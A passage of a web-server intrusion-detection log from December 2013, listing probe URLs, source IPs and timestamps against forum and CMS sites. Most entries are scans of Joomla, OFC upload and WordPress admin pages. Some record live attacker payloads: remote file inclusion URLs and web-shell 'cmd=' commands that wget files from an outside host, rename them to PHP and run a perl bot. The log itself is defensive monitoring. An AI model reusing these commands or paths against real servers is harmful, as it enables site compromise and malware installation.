  613. DATE: 04-Dec-2013 12:42:36
  614. -------------------------
  615. LOG: Nasty Joomla Probe
  616. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  617. IP: 88.81.91.170
  618. DATE: 04-Dec-2013 12:42:49
  619. -------------------------
  620. LOG: Images Stories Hack Probe
  621. URL: http://www.scriptz-team.info/images/stories/food.php?rf
  622. IP: 88.81.91.170
  623. DATE: 04-Dec-2013 12:43:03
  624. -------------------------
  625. LOG: Detects basic directory traversal
  626. URL: http://f.scriptz-team.info/index.php?act=Search&CODE=show&searchid=fa285b3ff91be6202c8498defe3501c9&search_in=posts&result_type=topics&highlite=freelance%5C.
  627. IP: 117.64.239.132
  628. DATE: 04-Dec-2013 12:48:34
  629. -------------------------
  630. LOG: Detects common XSS concatenation patterns 1/2
  631. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  632. IP: 172.245.214.178
  633. DATE: 04-Dec-2013 12:48:39
  634. -------------------------
  635. LOG: Nasty Joomla Probe
  636. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  637. IP: 77.76.217.46
  638. DATE: 04-Dec-2013 13:06:54
  639. -------------------------
  640. LOG: Nasty Joomla Probe
  641. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  642. IP: 77.76.217.46
  643. DATE: 04-Dec-2013 13:06:55
  644. -------------------------
  645. LOG: Images Stories Hack Probe
  646. URL: http://www.scriptz-team.info/images/stories/food.php?rf
  647. IP: 77.76.217.46
  648. DATE: 04-Dec-2013 13:07:08
  649. -------------------------
  650. LOG: Admin Probe
  651. URL: http://nzbx.ws/wordpress/wp-admin/
  652. IP: 64.142.100.58
  653. DATE: 04-Dec-2013 13:40:55
  654. -------------------------
  655. LOG: Admin Probe
  656. URL: http://nzbx.ws/blog/wp-admin/
  657. IP: 72.32.36.154
  658. DATE: 04-Dec-2013 14:03:06
  659. -------------------------
  660. LOG: Admin Probe
  661. URL: http://nzbx.ws/wp-admin/
  662. IP: 50.6.77.20
  663. DATE: 04-Dec-2013 14:25:23
  664. -------------------------
  665. LOG: Detects obfuscated JavaScript script injections
  666. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-Impex/090056-phpbb3-gt-import-into-vBulletin-4-2.html+/phpbb3/+dumb&ct=clnk
  667. IP: 58.20.127.100
  668. DATE: 04-Dec-2013 14:30:05
  669. -------------------------
  670. LOG: Nasty Joomla Probe
  671. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-3-8-Questions-Problems-and-Troubles/050930-Index-php-file-information.html&sa=U&ei=tASfUtGcKsv9oATZ6YDACA&ved=0CK4BEBYwHTigBg&usg=AFQjCNGmfBZoIpZPWA_RE0n2g17Nv3l1pg/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  672. IP: 188.44.39.75
  673. DATE: 04-Dec-2013 14:34:14
  674. -------------------------
  675. LOG: Nasty Joomla Probe
  676. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  677. IP: 188.44.39.75
  678. DATE: 04-Dec-2013 14:34:14
  679. -------------------------
  680. LOG: Nasty Joomla Probe
  681. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-3-8-Questions-Problems-and-Troubles/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  682. IP: 188.44.39.75
  683. DATE: 04-Dec-2013 14:34:15
  684. -------------------------
  685. LOG: Nasty Joomla Probe
  686. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-3-8-Questions-Problems-and-Troubles/087057-Error-messages-on-index-php.html&sa=U&ei=tASfUtGcKsv9oATZ6YDACA&ved=0CJsCEBYwMjigBg&usg=AFQjCNHaE4IIttviGTs6KoljSOoctS3_lg/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  687. IP: 188.44.39.75
  688. DATE: 04-Dec-2013 14:34:41
  689. -------------------------
  690. LOG: Images Stories Hack Probe
  691. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-3-8-Questions-Problems-and-Troubles/087057-Error-messages-on-index-php.html&sa=U&ei=tASfUtGcKsv9oATZ6YDACA&ved=0CJsCEBYwMjigBg&usg=AFQjCNHaE4IIttviGTs6KoljSOoctS3_lg//images/stories/wawalo.php?rf
  692. IP: 188.44.39.75
  693. DATE: 04-Dec-2013 14:34:42
  694. -------------------------
  695. LOG: Images Stories Hack Probe
  696. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-3-8-Questions-Problems-and-Troubles/087057-Error-messages-on-index-php.html&sa=U&ei=tASfUtGcKsv9oATZ6YDACA&ved=0CJsCEBYwMjigBg&usg=AFQjCNHaE4IIttviGTs6KoljSOoctS3_lg//images/stories/food/footer.php?clone
  697. IP: 188.44.39.75
  698. DATE: 04-Dec-2013 14:34:43
  699. -------------------------
  700. LOG: Nasty Joomla Probe
  701. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/084651-VBV-5944-Filesystem-Cache-gt-Redirects-to-core-install-index-php-when-filecache-location-is-not-provided.html&sa=U&ei=tASfUtGcKsv9oATZ6YDACA&ved=0CNACEBYwPTigBg&usg=AFQjCNHpQwxTp_Skodb9p4CHfN1QjZF6RA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  702. IP: 188.44.39.75
  703. DATE: 04-Dec-2013 14:34:54
  704. -------------------------
  705. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  706. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/065608-Images-vBulletin-4-1-8-Styles-verf%C3%83%C2%BCgbar.html
  707. IP: 85.31.186.212
  708. DATE: 04-Dec-2013 14:38:00
  709. -------------------------
  710. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  711. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/065705-Emotion-vBulletin-4-1-8-Style-verf%C3%83%C2%BCgbar.html
  712. IP: 85.31.186.212
  713. DATE: 04-Dec-2013 14:38:03
  714. -------------------------
  715. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  716. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/065706-Harmony-vBulletin-4-1-8-Style-verf%C3%83%C2%BCgbar.html
  717. IP: 85.31.186.212
  718. DATE: 04-Dec-2013 14:38:05
  719. -------------------------
  720. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  721. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/065816-Blue-Red-und-Green-vBulletin-4-1-8-Styles-verf%C3%83%C2%BCgbar.html
  722. IP: 85.31.186.212
  723. DATE: 04-Dec-2013 14:38:37
  724. -------------------------
  725. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  726. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/066235-vBCMS%C3%82%C2%AE-3-0-8-verf%C3%83%C2%BCgbar.html
  727. IP: 85.31.186.212
  728. DATE: 04-Dec-2013 14:38:40
  729. -------------------------
  730. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  731. URL: http://newz.scriptz-team.info/vBCMS-News-and-Updates/066723-vBCMS%C2%AE-3-0-8-verf%C3%BCgbar.html
  732. IP: 85.31.186.212
  733. DATE: 04-Dec-2013 14:38:41
  734. -------------------------
  735. LOG: OFC Probe
  736. URL: http://newz.scriptz-team.info/archive-page-1365.html&sa=U&ei=bQWfUs7zAeHX7AaJ_oDgCQ&ved=0CLoCEBYwOjjIAQ&usg=AFQjCNFNP1t6GHENv_sWhHVqUAIzGymmqA/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=attila.php
  737. IP: 110.4.45.173
  738. DATE: 04-Dec-2013 14:50:00
  739. -------------------------
  740. LOG: OFC Probe
  741. URL: http://newz.scriptz-team.info/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=attila.php
  742. IP: 110.4.45.173
  743. DATE: 04-Dec-2013 14:50:04
  744. -------------------------
  745. LOG: OFC Probe
  746. URL: http://newz.scriptz-team.info/archive-page-999.html&sa=U&ei=bQWfUs7zAeHX7AaJ_oDgCQ&ved=0CL8CEBYwOzjIAQ&usg=AFQjCNHmWdeF_iZG9C7eQyKBMHH7MGjVaw/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=attila.php
  747. IP: 110.4.45.173
  748. DATE: 04-Dec-2013 14:50:05
  749. -------------------------
  750. LOG: OFC Probe
  751. URL: http://newz.scriptz-team.info/archive-page-2859.html&sa=U&ei=bQWfUs7zAeHX7AaJ_oDgCQ&ved=0CMUCEBYwPDjIAQ&usg=AFQjCNGF9N-LMx2hLwbBgwvnPw0AToBHKQ/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=attila.php
  752. IP: 110.4.45.173
  753. DATE: 04-Dec-2013 14:50:06
  754. -------------------------
  755. LOG: Detects JavaScript with(), ternary operators and XML predicate attacks
  756. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/072452-Forum-Wordpress-vs-vbCMS-vs-vBadvanced-for-news-article-home-page-for-forum.html&sa=U&ei=yLGeUti8LcqssATPwIHoAQ&ved=0CLYDEBYwTziOAg&usg=AFQjCNHNppPB-V6vVFpFfi493QzhSJbdqw//?page=http://www.guldensporen.be/images/stories/lock.jpg??
  757. IP: 211.47.181.38
  758. DATE: 04-Dec-2013 14:58:34
  759. -------------------------
  760. LOG: Detects JavaScript with(), ternary operators and XML predicate attacks
  761. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/072452-Forum-Wordpress-vs-vbCMS-vs-vBadvanced-for-news-article-home-page-for-forum.html&sa=U&ei=yLGeUti8LcqssATPwIHoAQ&ved=0CLYDEBYwTziOAg&usg=AFQjCNHNppPB-V6vVFpFfi493QzhSJbdqw//?page=http://212.217.30.194:32000/self.inc??
  762. IP: 211.47.181.38
  763. DATE: 04-Dec-2013 14:58:37
  764. -------------------------
  765. LOG: Detects JavaScript with(), ternary operators and XML predicate attacks
  766. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/072452-Forum-Wordpress-vs-vbCMS-vs-vBadvanced-for-news-article-home-page-for-forum.html&sa=U&ei=yLGeUti8LcqssATPwIHoAQ&ved=0CLYDEBYwTziOAg&usg=AFQjCNHNppPB-V6vVFpFfi493QzhSJbdqw//?page=http://212.217.30.194:32000/options.inc???ON2???
  767. IP: 211.47.181.38
  768. DATE: 04-Dec-2013 14:58:40
  769. -------------------------
  770. LOG: Images Stories Hack Probe
  771. URL: http://newz.scriptz-team.info//?page=http://www.guldensporen.be/images/stories/lock.jpg??
  772. IP: 211.47.181.38
  773. DATE: 04-Dec-2013 14:58:50
  774. -------------------------
  775. LOG: Images Stories Hack Probe
  776. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles//?page=http://www.guldensporen.be/images/stories/lock.jpg??
  777. IP: 211.47.181.38
  778. DATE: 04-Dec-2013 14:59:10
  779. -------------------------
  780. LOG: Server backup dl files
  781. URL: http://skripterz.info/api/skripterz_for_phpBB.zip
  782. IP: 83.4.67.87
  783. DATE: 04-Dec-2013 15:48:50
  784. -------------------------
  785. LOG: Server backup dl files
  786. URL: http://skripterz.info/api/skripterz_for_phpBB.zip
  787. IP: 83.4.67.87
  788. DATE: 04-Dec-2013 15:48:50
  789. -------------------------
  790. LOG: Server backup dl files
  791. URL: http://skripterz.info/api/skripterz_for_phpBB.zip
  792. IP: 83.4.67.87
  793. DATE: 04-Dec-2013 15:48:50
  794. -------------------------
  795. LOG: Images Stories Hack Probe
  796. URL: http://www.scriptz-team.info/images/stories/food.php?rf
  797. IP: 180.76.6.61
  798. DATE: 04-Dec-2013 16:57:37
  799. -------------------------
  800. LOG: Detects common XSS concatenation patterns 1/2
  801. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  802. IP: 27.153.232.165
  803. DATE: 04-Dec-2013 17:07:50
  804. -------------------------
  805. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  806. URL: http://newz.scriptz-team.info/phpFox-Company-Blog/083475-Vote-for-phpFox-at-Critic%E2%80%99s-Choice-CMS-Awards.html
  807. IP: 58.22.21.2
  808. DATE: 04-Dec-2013 17:37:05
  809. -------------------------
  810. LOG: Detects common XSS concatenation patterns 1/2
  811. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/083812-VBV-5669-Invalid-URL-when-trying-to-moderate-items-from-ACP-start-page.html"|"--"|"--"|"[VBV-5669]
  812. IP: 14.147.91.52
  813. DATE: 04-Dec-2013 17:58:30
  814. -------------------------
  815. LOG: Detects common XSS concatenation patterns 1/2
  816. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  817. IP: 184.154.28.86
  818. DATE: 04-Dec-2013 18:43:50
  819. -------------------------
  820. LOG: Detects common XSS concatenation patterns 1/2
  821. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  822. IP: 184.154.28.86
  823. DATE: 04-Dec-2013 18:43:52
  824. -------------------------
  825. LOG: Install, Upgrade Probe
  826. URL: http://scriptz-team.info/install.php
  827. IP: 188.94.230.146
  828. DATE: 04-Dec-2013 20:23:54
  829. -------------------------
  830. LOG: Detects common XSS concatenation patterns 1/2
  831. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  832. IP: 216.238.65.6
  833. DATE: 04-Dec-2013 20:44:00
  834. -------------------------
  835. LOG: Detects self contained xss via with(), common loops and regex to string conversion
  836. URL: http://php-app.info/p/[YouTube]VideoGrabber
  837. IP: 198.211.110.246
  838. DATE: 04-Dec-2013 21:04:17
  839. -------------------------
  840. LOG: Detects common XSS concatenation patterns 1/2
  841. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  842. IP: 108.163.228.14
  843. DATE: 04-Dec-2013 21:04:29
  844. -------------------------
  845. LOG: Detects common XSS concatenation patterns 1/2
  846. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  847. IP: 108.163.228.14
  848. DATE: 04-Dec-2013 21:04:30
  849. -------------------------
  850. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  851. URL: http://newz.scriptz-team.info/doc/Cron-Based-Email-Sending-%C2%96-vBulletin-mail-queue-back-log.doc
  852. IP: 180.76.6.142
  853. DATE: 04-Dec-2013 23:15:19
  854. -------------------------
  855. LOG: Detects common XSS concatenation patterns 1/2
  856. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  857. IP: 83.8.6.1
  858. DATE: 04-Dec-2013 23:22:09
  859. -------------------------
  860. LOG: Detects common XSS concatenation patterns 1/2
  861. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  862. IP: 83.8.6.1
  863. DATE: 04-Dec-2013 23:22:10
  864. -------------------------
  865. LOG: Detects common XSS concatenation patterns 1/2
  866. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  867. IP: 192.3.176.191
  868. DATE: 04-Dec-2013 23:32:26
  869. -------------------------
  870. LOG: Detects common XSS concatenation patterns 1/2
  871. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  872. IP: 192.3.176.191
  873. DATE: 04-Dec-2013 23:32:28
  874. -------------------------
  875. LOG: Detects common XSS concatenation patterns 1/2
  876. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  877. IP: 184.154.141.4
  878. DATE: 04-Dec-2013 23:49:14
  879. -------------------------
  880. LOG: Detects common XSS concatenation patterns 1/2
  881. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  882. IP: 184.154.141.4
  883. DATE: 04-Dec-2013 23:49:25
  884. -------------------------
  885. LOG: Detects common XSS concatenation patterns 1/2
  886. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  887. IP: 198.20.79.173
  888. DATE: 04-Dec-2013 23:56:42
  889. -------------------------
  890. LOG: Detects common XSS concatenation patterns 1/2
  891. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  892. IP: 198.20.79.173
  893. DATE: 04-Dec-2013 23:56:45
  894. -------------------------
  895. LOG: Detects basic obfuscated JavaScript script injections
  896. URL: http://newz.scriptz-team.info/searchResult/.html
  897. IP: 50.57.190.113
  898. DATE: 05-Dec-2013 01:20:17
  899. -------------------------
  900. LOG: Install, Upgrade Probe
  901. URL: http://scriptz-team.info/app/ver/sites/koobi_update.php
  902. IP: 182.178.67.195
  903. DATE: 05-Dec-2013 01:28:14
  904. -------------------------
  905. LOG: Detects common XSS concatenation patterns 1/2
  906. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  907. IP: 66.248.193.67
  908. DATE: 05-Dec-2013 04:16:17
  909. -------------------------
  910. LOG: Detects common XSS concatenation patterns 1/2
  911. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  912. IP: 66.248.193.67
  913. DATE: 05-Dec-2013 04:16:20
  914. -------------------------
  915. LOG: Detects common XSS concatenation patterns 1/2
  916. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  917. IP: 83.8.64.183
  918. DATE: 05-Dec-2013 05:24:05
  919. -------------------------
  920. LOG: Detects common XSS concatenation patterns 1/2
  921. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  922. IP: 83.8.64.183
  923. DATE: 05-Dec-2013 05:24:06
  924. -------------------------
  925. LOG: OFC Probe
  926. URL: http://newz.scriptz-team.info/core/lib/php-ofc-library/ofc_upload_image.php
  927. IP: 59.106.141.147
  928. DATE: 05-Dec-2013 05:29:38
  929. -------------------------
  930. LOG: OFC Probe
  931. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Board-3-0/core/lib/php-ofc-library/ofc_upload_image.php
  932. IP: 59.106.141.147
  933. DATE: 05-Dec-2013 05:29:38
  934. -------------------------
  935. LOG: Detects common XSS concatenation patterns 1/2
  936. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  937. IP: 120.43.30.19
  938. DATE: 05-Dec-2013 06:00:20
  939. -------------------------
  940. LOG: Admin Probe
  941. URL: http://nzbx.ws/article.php?group=pl.irc&article=148147&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLcBEBYwHQ&usg=AFQjCNGuYgymIeWJewYYUkChflMAO_DZag/admin/categories.php/login.php
  942. IP: 213.165.93.80
  943. DATE: 05-Dec-2013 06:48:00
  944. -------------------------
  945. LOG: Admin Probe
  946. URL: http://nzbx.ws/article.php?group=pl.irc&article=148147&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLcBEBYwHQ&usg=AFQjCNGuYgymIeWJewYYUkChflMAO_DZag/admin/file_manager.php/login.php
  947. IP: 213.165.93.80
  948. DATE: 05-Dec-2013 06:48:01
  949. -------------------------
  950. LOG: Admin Probe
  951. URL: http://nzbx.ws/article.php?group=pl.irc&article=148147&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLcBEBYwHQ&usg=AFQjCNGuYgymIeWJewYYUkChflMAO_DZag/admin/banner_manager.php/login.php
  952. IP: 213.165.93.80
  953. DATE: 05-Dec-2013 06:48:02
  954. -------------------------
  955. LOG: Admin Probe
  956. URL: http://nzbx.ws/admin/categories.php/login.php
  957. IP: 213.165.93.80
  958. DATE: 05-Dec-2013 06:48:05
  959. -------------------------
  960. LOG: Admin Probe
  961. URL: http://nzbx.ws/admin/file_manager.php/login.php
  962. IP: 213.165.93.80
  963. DATE: 05-Dec-2013 06:48:06
  964. -------------------------
  965. LOG: Admin Probe
  966. URL: http://nzbx.ws/admin/banner_manager.php/login.php
  967. IP: 213.165.93.80
  968. DATE: 05-Dec-2013 06:48:07
  969. -------------------------
  970. LOG: Admin Probe
  971. URL: http://nzbx.ws/article.php?group=pl.irc&article=148149&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLwBEBYwHg&usg=AFQjCNFEgKdIyz-M0gZdA887YRQPGzYGVg/admin/categories.php/login.php
  972. IP: 213.165.93.80
  973. DATE: 05-Dec-2013 06:48:07
  974. -------------------------
  975. LOG: Admin Probe
  976. URL: http://nzbx.ws/article.php?group=pl.irc&article=148149&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLwBEBYwHg&usg=AFQjCNFEgKdIyz-M0gZdA887YRQPGzYGVg/admin/file_manager.php/login.php
  977. IP: 213.165.93.80
  978. DATE: 05-Dec-2013 06:48:08
  979. -------------------------
  980. LOG: Admin Probe
  981. URL: http://nzbx.ws/article.php?group=pl.irc&article=148149&sa=U&ei=-eifUsDyEKOR0AXCl4HwCg&ved=0CLwBEBYwHg&usg=AFQjCNFEgKdIyz-M0gZdA887YRQPGzYGVg/admin/banner_manager.php/login.php
  982. IP: 213.165.93.80
  983. DATE: 05-Dec-2013 06:48:09
  984. -------------------------
  985. LOG: Nasty Joomla Probe
  986. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  987. IP: 206.191.25.90
  988. DATE: 05-Dec-2013 08:31:35
  989. -------------------------
  990. LOG: Nasty Joomla Probe
  991. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  992. IP: 206.191.25.90
  993. DATE: 05-Dec-2013 08:31:36
  994. -------------------------
  995. LOG: Images Stories Hack Probe
  996. URL: http://newz.scriptz-team.info/images/stories/config.inc.php?rf
  997. IP: 206.191.25.90
  998. DATE: 05-Dec-2013 08:31:38
  999. -------------------------
  1000. LOG: Detects common XSS concatenation patterns 1/2
  1001. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1002. IP: 27.153.186.250
  1003. DATE: 05-Dec-2013 08:57:09
  1004. -------------------------
  1005. LOG: Detects common XSS concatenation patterns 1/2
  1006. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1007. IP: 184.154.141.6
  1008. DATE: 05-Dec-2013 09:25:55
  1009. -------------------------
  1010. LOG: Detects common XSS concatenation patterns 1/2
  1011. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1012. IP: 184.154.141.6
  1013. DATE: 05-Dec-2013 09:25:57
  1014. -------------------------
  1015. LOG: Nasty Joomla Probe
  1016. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1017. IP: 91.121.184.33
  1018. DATE: 05-Dec-2013 09:26:06
  1019. -------------------------
  1020. LOG: Nasty Joomla Probe
  1021. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1022. IP: 91.121.184.33
  1023. DATE: 05-Dec-2013 09:26:07
  1024. -------------------------
  1025. LOG: Images Stories Hack Probe
  1026. URL: http://newz.scriptz-team.info/images/stories/cliti.php?rf
  1027. IP: 91.121.184.33
  1028. DATE: 05-Dec-2013 09:26:09
  1029. -------------------------
  1030. LOG: Images Stories Hack Probe
  1031. URL: http://newz.scriptz-team.info/Vivvo-CMS-News-and-Press-Releases-page-1.html&sa=U&ei=7SSgUp6zN8_GswaG4YCwDw&ved=0CNoDEBYwTg&usg=AFQjCNEBgihewf60aqV75vM3QhVg5HLnpw//images/stories/bad.php
  1032. IP: 176.28.49.238
  1033. DATE: 05-Dec-2013 11:06:34
  1034. -------------------------
  1035. LOG: Images Stories Hack Probe
  1036. URL: http://newz.scriptz-team.info//images/stories/bad.php
  1037. IP: 176.28.49.238
  1038. DATE: 05-Dec-2013 11:06:36
  1039. -------------------------
  1040. LOG: Nasty Joomla Probe
  1041. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1042. IP: 50.18.204.195
  1043. DATE: 05-Dec-2013 11:09:48
  1044. -------------------------
  1045. LOG: Images Stories Hack Probe
  1046. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?rf
  1047. IP: 50.18.204.195
  1048. DATE: 05-Dec-2013 11:09:49
  1049. -------------------------
  1050. LOG: Detects basic directory traversal
  1051. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?cmd=wget%20http://bpch.ir/wp-content/plugins/wp-jalali/.../robot.txt;%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20perl*
  1052. IP: 50.18.204.195
  1053. DATE: 05-Dec-2013 11:09:50
  1054. -------------------------
  1055. LOG: Detects basic directory traversal
  1056. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?cmd=wget%20http://bpch.ir/wp-content/plugins/wp-jalali/.../dah.jpg;mv%20dah.jpg%20dah.php
  1057. IP: 50.18.204.195
  1058. DATE: 05-Dec-2013 11:09:51
  1059. -------------------------
  1060. LOG: Detects basic directory traversal
  1061. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?cmd=wget%20http://bpch.ir/wp-content/plugins/wp-jalali/.../killer.jpg;mv%20killer.jpg%20killer.php
  1062. IP: 50.18.204.195
  1063. DATE: 05-Dec-2013 11:09:52
  1064. -------------------------
  1065. LOG: Detects basic directory traversal
  1066. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?cmd=wget%20http://bpch.ir/wp-content/plugins/wp-jalali/.../bypass.php
  1067. IP: 50.18.204.195
  1068. DATE: 05-Dec-2013 11:09:52
  1069. -------------------------
  1070. LOG: Detects basic directory traversal
  1071. URL: http://www.scriptz-team.info//images/stories/dahkiller.php?cmd=wget%20http://bpch.ir/wp-content/plugins/wp-jalali/.../index.inc.php
  1072. IP: 50.18.204.195
  1073. DATE: 05-Dec-2013 11:09:53
  1074. -------------------------
  1075. LOG: Images Stories Hack Probe
  1076. URL: http://www.scriptz-team.info//images/stories/bypass.php
  1077. IP: 50.18.204.195
  1078. DATE: 05-Dec-2013 11:09:54
  1079. -------------------------
  1080. LOG: Detects common XSS concatenation patterns 1/2
  1081. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1082. IP: 173.0.52.160
  1083. DATE: 05-Dec-2013 12:02:09
  1084. -------------------------
  1085. LOG: Detects common XSS concatenation patterns 1/2
  1086. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1087. IP: 173.0.52.160
  1088. DATE: 05-Dec-2013 12:02:11
  1089. -------------------------
  1090. LOG: Detects conditional SQL injection attempts
  1091. URL: http://newz.scriptz-team.info/XenForo-Development-Questions/096526-Having-problems-putting-PHP-into-a-page.html
  1092. IP: 62.210.215.100
  1093. DATE: 05-Dec-2013 12:10:34
  1094. -------------------------
  1095. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1096. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Board-3-0/0166-Serbian-latin-characters-and269-and263-%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%A6%C3%82%C2%BE-and273-%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%A6%C3%82%C2%A1.html
  1097. IP: 208.110.91.146
  1098. DATE: 05-Dec-2013 12:45:04
  1099. -------------------------
  1100. LOG: Admin Probe
  1101. URL: http://nzbx.ws/blog/wp-admin/
  1102. IP: 108.63.22.185
  1103. DATE: 05-Dec-2013 12:55:47
  1104. -------------------------
  1105. LOG: Detects common XSS concatenation patterns 1/2
  1106. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1107. IP: 58.212.238.206
  1108. DATE: 05-Dec-2013 13:18:11
  1109. -------------------------
  1110. LOG: Detects common XSS concatenation patterns 1/2
  1111. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1112. IP: 58.212.238.206
  1113. DATE: 05-Dec-2013 13:18:13
  1114. -------------------------
  1115. LOG: Admin Probe
  1116. URL: http://nzbx.ws/wp/wp-admin/
  1117. IP: 50.63.197.21
  1118. DATE: 05-Dec-2013 13:40:09
  1119. -------------------------
  1120. LOG: Detects concatenated basic SQL injection and SQLLFI attempts
  1121. URL: http://newz.scriptz-team.info/CreateUser.asp
  1122. IP: 27.159.197.85
  1123. DATE: 05-Dec-2013 13:49:46
  1124. -------------------------
  1125. LOG: Detects conditional SQL injection attempts
  1126. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/084093-VBV-5759-Soft-Deleted-Posts-Prior-to-Upgrade-Result-in-Thread-having-internal-error.html
  1127. IP: 15.185.110.49
  1128. DATE: 05-Dec-2013 13:50:31
  1129. -------------------------
  1130. LOG: OFC Probe
  1131. URL: http://rlzlog.info/%3Ft%3DPaul_Lennar_-_VS_(Proton_Radio)-SBD-12-04-2013-TALiON_INT%26date%3D2013-12-05%252009:51:27%26cat%3DMP3%26size%3D76.8MB%257C1F%26key%3Db80d7e782283dce366fa034403194b8c&sa=U&ei=YkugUtSdBJHzoAS784LwAQ&ved=0CPMDEBYwYzisAg&usg=AFQjCNG1H7a8VQTgfi7oy0OWEyjp6MC6Rw//admin_area/charts/ofc-library/ofc_upload_image.php
  1132. IP: 46.105.121.167
  1133. DATE: 05-Dec-2013 13:52:02
  1134. -------------------------
  1135. LOG: Install, Upgrade Probe
  1136. URL: http://www.rlzlog.info/admin.php
  1137. IP: 84.238.226.168
